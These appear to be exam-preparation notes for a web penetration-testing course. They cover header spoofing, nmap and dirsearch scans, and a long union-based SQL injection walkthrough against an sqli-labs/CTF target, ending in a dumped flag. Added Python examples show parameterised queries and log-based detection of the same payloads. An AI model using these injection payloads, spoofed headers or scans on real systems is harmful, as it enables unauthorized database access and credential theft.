100 points in total

20 points: theory questions

80 points: practical questions

20 points of theory
Accumulated basic knowledge

50 + 30
50 points: small challenges. 5 challenges, 5 keys.
SQL injection
File upload
Command execution
File inclusion
Cookies
XSS

30 points: comprehensive challenge. 3 keys
Full penetration test
Web vulnerability discovery, port-based penetration
webshell
Privilege escalation
Windows privilege escalation: SQL Server xp_cmdshell
Linux privilege escalation: SUID

Request:

GET /challenges HTTP/1.1
Host: hazelshishuaige.club:8000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://hazelshishuaige.club:8000/users
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=942c2275-7738-45eb-aaaa-50a292479bc3.q1uHQ9BkyvBDdzL02e9gCf3VVc0
Connection: close


Response:

HTTP/1.1 302 FOUND
Server: gunicorn/19.9.0
Date: Sat, 03 Dec 2022 01:23:35 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 263
Location: http://hazelshishuaige.club:8000/login?next=%2Fchallenges%3F

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/login?next=%2Fchallenges%3F">/login?next=%2Fchallenges%3F</a>. If not click the link.

Platform address:

http://hazelshishuaige.club:8000/


It doesn’t come from ‘https://www.secret.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 SomeOne
referer:https://www.secret.com
X-FORWARDED-FOR:127.0.0.1


Keep adjusting the request until the page's hint mentions 23333.

curl hazelshishuaige.club:28001/ \
--header 'X-Forwarded-For:127.0.0.1' \
--header 'User-Agent:SniperOJ-Web-Broswer' \
--local-port 23333


Solution approach:

GET / HTTP/1.1
Host: hazelshishuaige.club:28001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: SniperOJ-Web-Broswer
X-FORWARDED-FOR: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=c08cbbad-8ccf-4fda-87ce-b6e465f2e9a3.LZAXUrjKkGRIHW_Equ91T5JGlLk
Connection: close

Ports

nmap

nmap.exe -sS -p- 123.171.255.158


C:\Program Files (x86)\Nmap>nmap.exe -sV -p 22,3301,2377,8000,40355 123.171.255.158


Remote desktop


Script-based vulnerability scan

╭─hazel@hazeldeMacBook-Pro ~/Desktop/pte
╰─$ nmap -p 445 --script=smb-vuln-ms17-010 192.168.0.186
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-03 14:20 CST
Nmap scan report for 192.168.0.186
Host is up (0.0026s latency).

PORT STATE SERVICE
445/tcp closed microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

Directories

Yujian (御剑)

Yujian scan

dirsearch

╭─hazel@hazeldeMacBook-Pro ~/tool/dirscan/dirsearch-master
╰─$ python3.8 dirsearch.py -u http://hazelshishuaige.club:28053/ -e * -t 2 -x 400-500

Database operations

CRUD: insert, delete, update, select

insert
drop
delete
update
select

Database login:

# mysql -uroot -proot -h 127.0.0.1

mysql> show databases; # list all databases
+--------------------+
| Database           |
+--------------------+
| information_schema | # created when MySQL is installed; holds the metadata of every database
| ceshi              |
| mysql              | # built-in MySQL database
| performance_schema | # built-in database
| security           |
+--------------------+
5 rows in set (0.00 sec)

mysql> use security # switch to the given database: use dbname;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables; # list all tables in the current database
+--------------------+
| Tables_in_security |
+--------------------+
| emails             |
| referers           |
| uagents            |
| users              |
+--------------------+
4 rows in set (0.00 sec)


mysql> desc users; # show the structure of the given table
+----------+-------------+------+-----+---------+----------------+
| Field    | Type        | Null | Key | Default | Extra          |
+----------+-------------+------+-----+---------+----------------+
| id       | int(3)      | NO   | PRI | NULL    | auto_increment |
| username | varchar(20) | NO   |     | NULL    |                |
| password | varchar(20) | NO   |     | NULL    |                |
+----------+-------------+------+-----+---------+----------------+
3 rows in set (0.00 sec)



mysql> select * from users; # query every row of the table
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
+----+----------+------------+
8 rows in set (0.00 sec)



mysql> select username from users; # query only the values of the username column of the table
+----------+
| username |
+----------+
| Dumb     |
| Angelina |
| Dummy    |
| secure   |
| stupid   |
| superman |
| batman   |
| admin    |
+----------+
8 rows in set (0.00 sec)


mysql> select * from users where username='admin'; # every column of the users row whose username is admin
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  8 | admin    | admin    |
+----+----------+----------+
1 row in set (0.00 sec)

select * from users where username=admin and password = admin;
mysql> select * from users where username='admin' and password='admin';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  8 | admin    | admin    |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where username='admin' and password='admn';
Empty set (0.00 sec)
The $name variable

<?php
$name = $_GET['username'];
$pass = $_GET['password'];
// a preg_match() filter could be applied here; the notes leave its body empty
$sql = "select * from users where username='" . $name . "' and password='" . $pass . "'";
mysqli_query($conn, $sql); // $conn: the mysqli connection opened earlier (not shown in the notes)
$name = $_GET['username']; # variable receiving the parameter of a GET request; the parameter is visible in the URL
$pass = $_GET['password'];
select * from users where username=$name and password = $pass;

http://www.baidu.com/index.php?username=admin&password=pass
?username=admin&password=pass: how parameters are passed in a GET request

$_POST['username']

Passed in the request body, so the request parameters are not visible in the URL; sent by the front-end HTML form.

$_REQUEST['cmd'] covers both $_GET and $_POST

SELECT queries: running two SQL statements at once

  1. union select (union query) – web

    two statements

select * from users where id =1 union select * from users where id =2
# executes two SELECT statements
# constraint: ** the two result sets must have the same number of columns

mysql> select * from users where id = 1; # number of columns
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id = 1 union select * from users where id =2;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
+----+----------+------------+
2 rows in set (0.00 sec)

mysql> select * from users where id = 1 union select username from users where id =2;
ERROR 1222 (21000): The used SELECT statements have a different number of columns

mysql> select password from users where id = 1 union select username from users where id =2;
+----------+
| password |
+----------+
| Dumb     |
| Angelina |
+----------+
2 rows in set (0.00 sec)

mysql> select password from users where id = 1 union select email_id from emails where id =2;
+------------------+
| password         |
+------------------+
| Dumb             |
| Angel@iloveu.com |
+------------------+
2 rows in set (0.00 sec)
  2. Splitting with ; – stacked injection
; lets several SQL statements run in one request

mysql> show databases; select version();
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ceshi              |
| mysql              |
| performance_schema |
| security           |
+--------------------+
5 rows in set (0.00 sec)

+-------------------------+
| version()               |
+-------------------------+
| 5.5.61-0ubuntu0.14.04.1 |
+-------------------------+
1 row in set (0.00 sec)


mysql> show databases; select version();select database();
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ceshi              |
| mysql              |
| performance_schema |
| security           |
+--------------------+
5 rows in set (0.00 sec)

+-------------------------+
| version()               |
+-------------------------+
| 5.5.61-0ubuntu0.14.04.1 |
+-------------------------+
1 row in set (0.00 sec)

+------------+
| database() |
+------------+
| security   |
+------------+
1 row in set (0.00 sec)
...........
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
SELECT * FROM users WHERE id='$id' LIMIT 0,1
select * from users where id='$id' limit 0,1

select * from users where id='1' limit 0,1;
limit 0,1 restricts how many rows are output
mysql> select * from users where id='1' #limit 0,1
    -> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)


select * from users where id='1''; SQL statement error
select * from users where id='1';#'; SQL statement error
# SQL comment markers; the common ones: #, --+, -- followed by a space. -- + or 1=1
mysql> select * from users where id='1';#';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id='1';-- + sfjka'skf;as;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> select * from users where username='admin' and 1=1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  8 | admin    | admin    |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where username='admin' and 1=2;
Empty set (0.00 sec)

mysql> select * from users where username=1 or 1=1 or 1=2;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
+----+----------+------------+
8 rows in set (0.00 sec)
...........
$id = $_GET['id'];
// ?id=123
// ?id=123'
// ?id=123'#
$sql="SELECT * FROM users WHERE id='123'' LIMIT 0,1";
// SQL actually executed: SELECT * FROM users WHERE id='123'' LIMIT 0,1
// SQL actually executed: SELECT * FROM users WHERE id='123' # ' LIMIT 0,1
// SQL actually executed: SELECT * FROM users WHERE id='123' union select .... 1. column count unknown 2. key flag
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

Determining the number of columns:

mysql> select * from users order by 3;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  8 | admin    | admin      |
|  4 | secure   | crappy     |
|  1 | Dumb     | Dumb       |
|  6 | superman | genious    |
|  2 | Angelina | I-kill-you |
|  7 | batman   | mob!le     |
|  3 | Dummy    | p@ssword   |
|  5 | stupid   | stupidity  |
+----+----------+------------+
8 rows in set (0.00 sec)

mysql> select * from users order by 4;
ERROR 1054 (42S22): Unknown column '4' in 'order clause'


SELECT * FROM users WHERE id='123' union select 1,2,3
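To see concretely what the concatenated queries in these notes do (the login query built from $name/$pass and the Less-1 id lookup), here is an added Python example that is not part of the original notes or of sqli-labs. It replays the payloads used above (and 1=2, order by N, union select 1,2,3, admin' -- ) against a constructed copy of the eight-row users table, once through string concatenation and once through a bound parameter. SQLite stands in for MySQL, so the comment form is "-- " (also listed in the notes) rather than "#".

```python
import sqlite3

# Constructed copy of the page's security.users rows (sqli-labs data).
# SQLite stands in for MySQL here, so "-- " is the comment marker, not "#".
USERS = [
    (1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword"),
    (4, "secure", "crappy"), (5, "stupid", "stupidity"), (6, "superman", "genious"),
    (7, "batman", "mob!le"), (8, "admin", "admin"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def build_query(id_param):
    # Same construction as $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1":
    # the client-controlled value is spliced straight into the SQL text.
    return "SELECT * FROM users WHERE id='" + id_param + "' LIMIT 0,1"


def vulnerable_lookup(conn, id_param):
    # Returns the rows, or the database error text when the injected SQL is
    # malformed (that error is what "order by N" column counting relies on).
    try:
        return conn.execute(build_query(id_param)).fetchall()
    except sqlite3.Error as exc:
        return "ERROR: " + str(exc)


def safe_lookup(conn, id_param):
    # Parameterised form: the driver binds the value, so it is only ever
    # compared with id and can never change the statement's structure.
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (id_param,)).fetchall()


def login(conn, username, password, safe):
    # The notes' "username=... and password=..." query, concatenated or bound.
    if safe:
        return conn.execute("SELECT * FROM users WHERE username=? AND password=?",
                            (username, password)).fetchall()
    sql = ("SELECT * FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = make_db()
    for payload in ["1", "1' and 1=2 -- ", "1' order by 4 -- ", "-1' union select 1,2,3 -- "]:
        print(repr(payload), "->", vulnerable_lookup(db, payload), "| bound:", safe_lookup(db, payload))
    print("admin' -- :", login(db, "admin' -- ", "x", safe=False), login(db, "admin' -- ", "x", safe=True))
```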

In the database, # is the comment marker; on the web, # has to be URL-encoded as %23.

http://hazelshishuaige.club:9901/Less-1/?id=1'order by 1%23
http://hazelshishuaige.club:9901/Less-1/?id=1'order by 10%23
http://hazelshishuaige.club:9901/Less-1/?id=1'order by 4%23

mysql> select * from users where id =1 union select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
|  1 | 2        | 3        |
+----+----------+----------+
2 rows in set (0.00 sec)
mysql> select * from users where id =1.1 union select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+
1 row in set (0.00 sec)

http://hazelshishuaige.club:9901/Less-1/?id=-1'union select 1,2,3%23
  1. version(): database version
  2. user(): database user
  3. database(): name of the database currently in use
  4. @@datadir: database data directory
  5. @@version_compile_os: operating system version

http://hazelshishuaige.club:9901/Less-1/?id=-1'union select 1,2,database()%23

Flag,key

1. Database name
| def | security | emails | BASE TABLE | InnoDB | 10 | Compact | 8 | 2048 | 16384 | 0 | 0 | 10485760 | 9 | 2022-12-03 14:46:02 | NULL | NULL | latin1_swedish_ci | NULL | | |
| def | security | referers | BASE TABLE | InnoDB | 10 | Compact | 0 | 0 | 16384 | 0 | 0 | 10485760 | 1 | 2022-12-03 14:46:02 | NULL | NULL | latin1_swedish_ci | NULL | | |
| def | security | uagents | BASE TABLE | InnoDB | 10 | Compact | 0 | 0 | 16384 | 0 | 0 | 10485760 | 1 | 2022-12-03 14:46:02 | NULL | NULL | latin1_swedish_ci | NULL | | |
| def | security | users | BASE TABLE | InnoDB | 10 | Compact | 8 | 2048 | 16384 | 0 | 0 | 10485760 | 9 | 2022-12-03 14:46:02 | NULL | NULL | latin1_swedish_ci | NULL | | |
+---------------+--------------------+----------------------------------------------+-------------+--------------------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-------------------+----------+-----------------+---------------------------------------------------+
85 rows in set (0.00 sec)

group_concat(): string aggregation function

mysql> select * from users where id =1.1 union select 1,2,group_concat(schema_name) from information_schema.schemata;
+----+----------+------------------------------------------------------------+
| id | username | password                                                   |
+----+----------+------------------------------------------------------------+
|  1 | 2        | information_schema,ceshi,mysql,performance_schema,security |
+----+----------+------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> select * from users where id =1.1 union select 1,2,concat(schema_name) from information_schema.schemata;
+----+----------+--------------------+
| id | username | password           |
+----+----------+--------------------+
|  1 | 2        | information_schema |
|  1 | 2        | ceshi              |
|  1 | 2        | mysql              |
|  1 | 2        | performance_schema |
|  1 | 2        | security           |
+----+----------+--------------------+
5 rows in set (0.00 sec)
The SCHEMATA table: it stores the index of every database name

?id=-1'union select 1,2,group_concat(schema_name) from information_schema.schemata %23

http://hazelshishuaige.club:9901/Less-1/?id=-1'union select 1,2,concat(schema_name) from information_schema.schemata limit 1,2 %23


2. Table names of a given database

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() %23

Equivalent ways to write the database name security in the query: 'security', database(), and the hex form 0x7365637572697479 (the bytes of "security").

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='information_schema' %23


3. Column names of a given table in a given database
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23

Your Login name:2
Your Password:id,username,password

Cross-database query
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='information_schema' and table_name='tables' %23


TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME,TABLE_TYPE,ENGINE,VERSION,ROW_FORMAT,TABLE_ROWS,AVG_ROW_LENGTH,DATA_LENGTH,MAX_DATA_LENGTH,INDEX_LENGTH,DATA_FREE,AUTO_INCREMENT,CREATE_TIME,UPDATE_TIME,CHECK_TIME,TABLE_COLLATION,CHECKSUM,CREATE_OPTIONS,TABLE_COMMENT

4. Column values of a table in a given database

?id=-1'union select 1,2,group_concat(id,username,password) from users %23

Cross-database query
?id=-1'union select 1,2,group_concat(VERSION) from information_schema.tables %23


id=1'#

id=1' and 1=2 #

SELECT * FROM userinfo WHERE `Id` = '1' and 1=2 #'

Common closing characters
'
"
')
")
'))
"))
Search-type injection
'%$id%'

'%1%' # %'
id=1' order by 1#
id=1' order by 4#

id=-1' union select 1,2,3,4#

id=-1' union select 1,2,3,group_concat(schema_name) from information_schema.schemata#

information_schema,mysql,test,performance_schema,hazel

id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='hazel'#

id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='flag'#
Id,flag

id=-1' union select 1,2,3,group_concat(id,flag) from flag#
NSCTF{f6c631f294a64dbb1e963f427fdc725d}
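From the defending side, the request sequence walked through above (quote plus %23 comment, order by N probing, union select, information_schema reads, and 1=2 tests) leaves a recognisable trail in the web server's access log. The following Python example is added here and is not part of the original notes; the log lines are constructed in the style of the Less-1 URLs, and the rule names are my own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines in the style of the Less-1 requests above; the
# query strings are URL-encoded exactly as a browser or curl would send them.
LOG_LINES = [
    '192.168.0.10 - - [03/Dec/2022:16:43:36 +0800] "GET /Less-1/?id=1 HTTP/1.1" 200 512',
    '192.168.0.10 - - [03/Dec/2022:16:43:40 +0800] "GET /Less-1/?id=1%27order%20by%204%23 HTTP/1.1" 200 498',
    '192.168.0.10 - - [03/Dec/2022:16:43:45 +0800] "GET /Less-1/?id=-1%27union%20select%201,2,'
    'group_concat(schema_name)%20from%20information_schema.schemata%20%23 HTTP/1.1" 200 640',
    '192.168.0.10 - - [03/Dec/2022:16:43:50 +0800] "GET /Less-1/?id=1%27%20and%201=2%20%23 HTTP/1.1" 200 498',
    '192.168.0.11 - - [03/Dec/2022:16:44:02 +0800] "GET /users?page=2 HTTP/1.1" 200 1024',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Each rule targets one step of the walkthrough: quote + comment closure,
# order-by column probing, union select, information_schema reads, tautologies.
RULES = {
    "quote_then_comment": re.compile(r"'.*(?:#|--[\s+])", re.S),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "tautology": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
}


def decoded_params(url):
    # parse_qsl decodes %27, %20, %23 and '+' once, giving the text the app saw.
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def flag_line(line):
    # Returns [(param, rule_name), ...] for every rule hit in the request's parameters.
    match = REQUEST_RE.search(line)
    if not match:
        return []
    hits = []
    for name, value in decoded_params(match.group(1)):
        hits.extend((name, rule) for rule, rx in RULES.items() if rx.search(value))
    return hits


def scan(lines):
    # Map line index -> hits, keeping only lines that triggered at least one rule.
    flagged = {}
    for i, line in enumerate(lines):
        hits = flag_line(line)
        if hits:
            flagged[i] = hits
    return flagged


if __name__ == "__main__":
    for idx, hits in scan(LOG_LINES).items():
        print(idx, hits)
```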
